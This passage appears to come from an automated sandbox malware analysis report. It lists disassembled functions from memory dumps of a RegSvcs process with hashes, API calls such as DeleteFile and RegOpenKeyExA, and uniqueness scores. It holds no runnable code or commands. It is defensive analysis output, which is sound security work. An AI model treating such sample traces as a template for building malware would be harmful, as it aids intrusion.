                                                        • Opcode Fuzzy Hash: fd17fcef6f1f5b0cc57c571e333ac6b48052f8c4bda07f10dac6a89dc8e4cf12
                                                        • Instruction Fuzzy Hash: 984145B0D00A58DFDB14CF99C885BDEFBB5BB09314F10812AE818A7350D7B89845CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004B78AD Relevance: 1.6, APIs: 1, Instructions: 101fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690552044.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: a525c3d47afb114af430b97105f50054b4fc8359a1be495e82edeef7939c9679
                                                        • Instruction ID: 67d86126e9c15bf893c25bebc12a73a0987592ee1cdac5fa29930f9d1ccb8f93
                                                        • Opcode Fuzzy Hash: a525c3d47afb114af430b97105f50054b4fc8359a1be495e82edeef7939c9679
                                                        • Instruction Fuzzy Hash: 244166B0D046589FEB10CFA9C8857DEBBF5EF88304F24852AE814A7350D7789846CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004B590E Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000002,?,00000000,?,?), ref: 004B59F7
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690552044.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: 8686409dbc2f607aca927b0b4ff48e819639cd45cbaff79c3bccb3a653b13c5a
                                                        • Instruction ID: c37d4a2b7b64a0941726e2875fccefc7a600082c5f7a7b3e1862d0ff48c5d88d
                                                        • Opcode Fuzzy Hash: 8686409dbc2f607aca927b0b4ff48e819639cd45cbaff79c3bccb3a653b13c5a
                                                        • Instruction Fuzzy Hash: 854135B0D006589FDB14CF99C885BDEFBB5BF49314F14852AE818AB350D7B89845CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004B78B8 Relevance: 1.6, APIs: 1, Instructions: 94fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690552044.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: 4929ca4e3ebe1963188b091d960ec7549e1a0662a5ef28111aff21fad9275d78
                                                        • Instruction ID: 3317f135039dee3a1fcb14727504785bf7642fa33a8aab5e2cca30e30b94ab01
                                                        • Opcode Fuzzy Hash: 4929ca4e3ebe1963188b091d960ec7549e1a0662a5ef28111aff21fad9275d78
                                                        • Instruction Fuzzy Hash: EC4146B0D046588FEB10CFA9C8857DEBBF5EF88314F24852AE814A7350D7789846CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004B5D29 Relevance: 1.5, APIs: 1, Instructions: 49registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCloseKey.KERNEL32(00000000), ref: 004B5D8F
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690552044.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 6275413d0fdc9897c813c12afd283b22b0040483265f2b69578d43de78878ff4
                                                        • Instruction ID: bd91cd58a167d2bb755f9e6ca3e34a12f656031b99a103e5c477aca546a8dff9
                                                        • Opcode Fuzzy Hash: 6275413d0fdc9897c813c12afd283b22b0040483265f2b69578d43de78878ff4
                                                        • Instruction Fuzzy Hash: 7F1146B08046498FCB10CF99D8487DEFFF8EB49314F24885AD558A7240C774AA45CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004B539C Relevance: 1.5, APIs: 1, Instructions: 48registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCloseKey.KERNEL32(00000000), ref: 004B5D8F
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690552044.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: d0fa92eb6ec2e6e1265e6dfc621fb4b0d6c33a16ee5faf8036f5fc1ea8338fe1
                                                        • Instruction ID: db74a738c96bc7994087dbd0bd3db5c57b0baf924e7c8c592a995a872269556e
                                                        • Opcode Fuzzy Hash: d0fa92eb6ec2e6e1265e6dfc621fb4b0d6c33a16ee5faf8036f5fc1ea8338fe1
                                                        • Instruction Fuzzy Hash: DE1113B0900609CFCB10CF99D448BDEFBF8EB49314F20881AD928A7340C779AA45CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004B5EB0 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 004B5F0C
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690552044.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: ForegroundWindow
                                                        • String ID:
                                                        • API String ID: 2020703349-0
                                                        • Opcode ID: f8fcae1cc14cdc96093a4f1304ee8a2c1f94d27257ab3593d4b554a68c9b2412
                                                        • Instruction ID: 3007abd9c9bcc18cfee4a266eeb195e6571fe6992d98bfd229c4f6bf3c9bf8ef
                                                        • Opcode Fuzzy Hash: f8fcae1cc14cdc96093a4f1304ee8a2c1f94d27257ab3593d4b554a68c9b2412
                                                        • Instruction Fuzzy Hash: E511D3B59006098FCB10CF99D4497DEFBF8EB49314F24845AD929B7740D379AA44CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04920820 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 17b9a8134fe7e0932531660f0351726f1f6ac5e5638ab2d7d4af1a22423715f3
                                                        • Instruction ID: 0f66ab99140858f68012fc92b5d021375c85cdb5a8992daf33d4315423136435
                                                        • Opcode Fuzzy Hash: 17b9a8134fe7e0932531660f0351726f1f6ac5e5638ab2d7d4af1a22423715f3
                                                        • Instruction Fuzzy Hash: D2512376F001248FCB14DBBCD9441AE77B7EBC83147248976D21ADB369EA32EC028791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04924A38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.X
                                                        • API String ID: 0-2930960324
                                                        • Opcode ID: 0004dabaeffc96c01dc5afa0a712f922158e292eead24071eff09778e7b4ddea
                                                        • Instruction ID: e325d068a5c44a1ec256f0ecac585414be110b6f649ad534c07c84345c5b966e
                                                        • Opcode Fuzzy Hash: 0004dabaeffc96c01dc5afa0a712f922158e292eead24071eff09778e7b4ddea
                                                        • Instruction Fuzzy Hash: 7211C431708221EBC7089BE4B65407A7FABFB812103449C7AD4179B50AEB21ED06ABA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04923C45 Relevance: .3, Instructions: 276COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 16397d399e4e0ccd9a1de7d77d000f1e877da4d12b45f5551104126421fcfc65
                                                        • Instruction ID: fb5b438e5cdb6a5a82aeca205babbd1ea52685ab2522258f48f7105d954e861c
                                                        • Opcode Fuzzy Hash: 16397d399e4e0ccd9a1de7d77d000f1e877da4d12b45f5551104126421fcfc65
                                                        • Instruction Fuzzy Hash: 9CB14B70E00219DFDB24CFB8D9857DDBBF6BF48304F148529E814A7298DB38A846CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04924534 Relevance: .3, Instructions: 262COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09e7718e252749b4ca57bcd02298032e6e7b9aaa8655f6bf5977c85882b632a2
                                                        • Instruction ID: 69fc4e9b011c2353c4254bc9bfc118a0f57af7dd31e4cd7345c1880d58de4f07
                                                        • Opcode Fuzzy Hash: 09e7718e252749b4ca57bcd02298032e6e7b9aaa8655f6bf5977c85882b632a2
                                                        • Instruction Fuzzy Hash: 6FB15C70E00229DFDB10CFA8C9857DDBBF5BF48314F148529D815A7258EB74A945CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04924E60 Relevance: .1, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 47d3cfeee5e6db92ee7a9fa95cfd242863376bca9fe0aa15af2d9e604ce483e4
                                                        • Instruction ID: 1a59d2e30ab2e4a95f024876face2dfbcaf23244587eba05f682076376d7f183
                                                        • Opcode Fuzzy Hash: 47d3cfeee5e6db92ee7a9fa95cfd242863376bca9fe0aa15af2d9e604ce483e4
                                                        • Instruction Fuzzy Hash: E441DD75B001109F8B44EBFAD5516AEB6E7AFC8208B50886DD406FB349EF34AD0687E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04921158 Relevance: .1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8ed77808793ced3d63cf60c10dd5e121eed48efb11f60bbff931b9a1e5b807f5
                                                        • Instruction ID: 8bfd98046f0a7fedeef15b06f2ab27c51c3791627bdbbf8834df39ab3285f649
                                                        • Opcode Fuzzy Hash: 8ed77808793ced3d63cf60c10dd5e121eed48efb11f60bbff931b9a1e5b807f5
                                                        • Instruction Fuzzy Hash: 34419C31F00228DBDB18AFB5C5517AEB6F6AB88204F10893DE406EB399DF319C118B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04920158 Relevance: .1, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 001f4a0fe7b50e8687f6ca2b94bb03590fac63192ea8a1ef5a9fa03ba25c1221
                                                        • Instruction ID: 16f602753c6ce0a7289775dd4c4d1f784f88daba9af7d7a5469f94e688cbbbd3
                                                        • Opcode Fuzzy Hash: 001f4a0fe7b50e8687f6ca2b94bb03590fac63192ea8a1ef5a9fa03ba25c1221
                                                        • Instruction Fuzzy Hash: 5C312B307082249FC710DF78D99485D7BF6AF46210B0049BAD509E7757E621AD05C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04921149 Relevance: .1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5b765bc7487073add84646b37c6ed28b75f0a4a10a25aadb28ecd2a8b4d28de
                                                        • Instruction ID: 53e8b43b0db56383c36eceaea8639c8185375090fddb732246f79d7c5a3471a7
                                                        • Opcode Fuzzy Hash: e5b765bc7487073add84646b37c6ed28b75f0a4a10a25aadb28ecd2a8b4d28de
                                                        • Instruction Fuzzy Hash: FC31B131F00214DBDB18ABB5D9456AEBBF7AB88304F10853DE406E7394DF3198128B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04921CE4 Relevance: .1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f1a40c9338675d53f7913bbe30c6697acc9522ecd025e650cd6c86dac374157
                                                        • Instruction ID: 14708f685996a9788f428c00500187ecc5f4f154d4f230e06bdc0e78a6c9aac0
                                                        • Opcode Fuzzy Hash: 1f1a40c9338675d53f7913bbe30c6697acc9522ecd025e650cd6c86dac374157
                                                        • Instruction Fuzzy Hash: 674115B4D00348DFDB14CF94C5946DEBBF5BF48304F208429E819AB254DB74AA56CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04921CF0 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d9544da01855d4ac519abb2cb25d8266d3a2ae9cf57b5efddf612d70f0b955ea
                                                        • Instruction ID: f5ae481cd03c8aaffaa9610e09b2e81ad1b14f7f6cebcfdb1b52177b37a94466
                                                        • Opcode Fuzzy Hash: d9544da01855d4ac519abb2cb25d8266d3a2ae9cf57b5efddf612d70f0b955ea
                                                        • Instruction Fuzzy Hash: A941F3B4D00248DFDB14CF99C994ADEBBF9BF48314F208429E819AB254DB74A955CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04920410 Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 548751ee140dd56031a1a53eac0952072c1b926d4d82d2df3fd910c619b91450
                                                        • Instruction ID: 933b9e9308bf656649098b00dc34f04bbeb7c63bb967c51d3e7bb15aab0ddced
                                                        • Opcode Fuzzy Hash: 548751ee140dd56031a1a53eac0952072c1b926d4d82d2df3fd910c619b91450
                                                        • Instruction Fuzzy Hash: 0121B0317049208FC714DA78DA509697BFAAF88650301C8BAE60ACB777FA21EC018B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04924E50 Relevance: .1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aff73ca53509a04731e8f38c84063afa452c00933f5a202ba23b240ab5b08e69
                                                        • Instruction ID: 5fe5e09d47d4421856093f21c440f9100503369ed296d3cedce2e9349b4e7fd9
                                                        • Opcode Fuzzy Hash: aff73ca53509a04731e8f38c84063afa452c00933f5a202ba23b240ab5b08e69
                                                        • Instruction Fuzzy Hash: 1A210575B001209FCB45ABBA96552AE73E7AFC9204750483DC006F7349EF34AE0687D6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04924BC8 Relevance: .1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 321317e3f6c904c475e55d869cc5e926dd3adced6e2d935ad3a9f2b1667c64e6
                                                        • Instruction ID: 340cdedf05c233eded9b12f5d37265b699cb4381dd0d093624a644c601edc8ac
                                                        • Opcode Fuzzy Hash: 321317e3f6c904c475e55d869cc5e926dd3adced6e2d935ad3a9f2b1667c64e6
                                                        • Instruction Fuzzy Hash: FF315C75D00328DFCB14DFA8D9806DDBBB5FB85314F248A6AD405AB305EB71A846CF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002AD01C Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690337751.00000000002AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2ad000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3bdefc79c6ca195410e911dbe905774809c8a509138da70b617017fea556aae
                                                        • Instruction ID: 3cff7aa556601f291174af658d76849705f457cbd16024083fe0df0c47791e8c
                                                        • Opcode Fuzzy Hash: b3bdefc79c6ca195410e911dbe905774809c8a509138da70b617017fea556aae
                                                        • Instruction Fuzzy Hash: 912134B4614204DFCB14CF20E884B16BBA5FB85314F34C969D84A4B646CB77D827CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002AD1D4 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690337751.00000000002AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2ad000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c313e74a48463ed6827cb475ed3723f1303930aa57c390b98c7e394119735687
                                                        • Instruction ID: 915939dc6b40d4e54343301cfa29fc4f164d5ea117972f551482479e00e326ff
                                                        • Opcode Fuzzy Hash: c313e74a48463ed6827cb475ed3723f1303930aa57c390b98c7e394119735687
                                                        • Instruction Fuzzy Hash: CF2146B4610204EFDB01CF50D9C0B26BBA5FB85314F34C96DEC0A4B642CB76D826CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002AD006 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690337751.00000000002AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2ad000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a6f49296ba16e3b90a0ecf87e3f5611c8371bda014914c1425b59035f6e64ccd
                                                        • Instruction ID: 2839728f82722ab37842aae17a90716926f13de69529c89447b197faecc34e87
                                                        • Opcode Fuzzy Hash: a6f49296ba16e3b90a0ecf87e3f5611c8371bda014914c1425b59035f6e64ccd
                                                        • Instruction Fuzzy Hash: 50217F754083809FCB02CF24D994711BF71EB46314F28C5EAD8458F666C73A985ACB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002AD1CF Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.690337751.00000000002AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2ad000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fb1eadd20ac99aa6da4a8f5c02d96e998fa6aeb7b9a37f1f5f61c90f9c305a4
                                                        • Instruction ID: 47d5d533b16c27020715d7c2c070994cf143d07d95e141493cdb92c22719105c
                                                        • Opcode Fuzzy Hash: 2fb1eadd20ac99aa6da4a8f5c02d96e998fa6aeb7b9a37f1f5f61c90f9c305a4
                                                        • Instruction Fuzzy Hash: 1811BB75904280DFDB12CF10D5C4B15BBA1FB85314F28C6ADDC0A4B656C33AD85ACB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 049248D1 Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f11bf3e81f752902e9b0c95550549246b271ffc655a55aad1206a7fd2ffc373e
                                                        • Instruction ID: 37762595c7efd0b2ce4b6897ce4b49e76c965191ea6c089b07a0337d642f385c
                                                        • Opcode Fuzzy Hash: f11bf3e81f752902e9b0c95550549246b271ffc655a55aad1206a7fd2ffc373e
                                                        • Instruction Fuzzy Hash: 2901F7B13141501BE30496AD59107DF99CFDBEDB40F15886D920AD73A7ED349D0643B6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04924D50 Relevance: .0, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5bdef068f9cd892664ff0563af4812f6e35cfe68cde7b85ac01426be51c03a3d
                                                        • Instruction ID: 42ac7e143b8be3844fa57a198dab924242bd631a4e5986f096742eeb9b724c81
                                                        • Opcode Fuzzy Hash: 5bdef068f9cd892664ff0563af4812f6e35cfe68cde7b85ac01426be51c03a3d
                                                        • Instruction Fuzzy Hash: 2DE01214798225269B5932B6191177E208F4F80569F10057AA6128A78EFF84B80512FB
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04920200 Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a341bc9428469269af1a0d856d908c1c577200a2b4e6f9181a4dbcd59db1c299
                                                        • Instruction ID: 443a03b8d4a1c840eff4c08ad7f23f55b68cca12a151ed548ec11c5d2c25070a
                                                        • Opcode Fuzzy Hash: a341bc9428469269af1a0d856d908c1c577200a2b4e6f9181a4dbcd59db1c299
                                                        • Instruction Fuzzy Hash: 5FE09274D1434CAFCB50EFB49A4618C7FF5FB19200B2044FAC808E3282E5306F469B52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04924970 Relevance: .0, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e9236753f739358f530455386b95974edeee37f859c469718fd09ab88d09692b
                                                        • Instruction ID: 6c88e9cf7bfabae80763a8f16a90f6213c64c6631eb2a35e5362d1dec518a04a
                                                        • Opcode Fuzzy Hash: e9236753f739358f530455386b95974edeee37f859c469718fd09ab88d09692b
                                                        • Instruction Fuzzy Hash: 15D0A7766583A0DFDB0DEF3168506EB3B27D3E4705B049665E00FC725CE63154035311
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04924D21 Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 988f6a4e2b8e3e392968d4d618da73c5ffb54b761e43aa06a22e53b0d841d4e7
                                                        • Instruction ID: 1cecd7f25bcb74a18b9581ae0406297e13706f52bb513906a2f74a2b945bd846
                                                        • Opcode Fuzzy Hash: 988f6a4e2b8e3e392968d4d618da73c5ffb54b761e43aa06a22e53b0d841d4e7
                                                        • Instruction Fuzzy Hash: A0D022327891828BCB0847249DA03E63FA1E7523A03160C9BC402DF022E92DA40F6E07
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04924980 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 61597f8f7e205ed9d12492ea1d0776013a8c24a5c373d3035004c7475d239e57
                                                        • Instruction ID: f9377a360ac109b5d2f56525d6c105e9e08df66d7ba56e65b49aff0eab8de9cd
                                                        • Opcode Fuzzy Hash: 61597f8f7e205ed9d12492ea1d0776013a8c24a5c373d3035004c7475d239e57
                                                        • Instruction Fuzzy Hash: BBC08C3436832897CB0CEB6A7C41A67339F93C8B05F04D920B10F1224C9AA1B8025180
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 049203F8 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.692910959.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_4920000_RegSvcs.jbxd
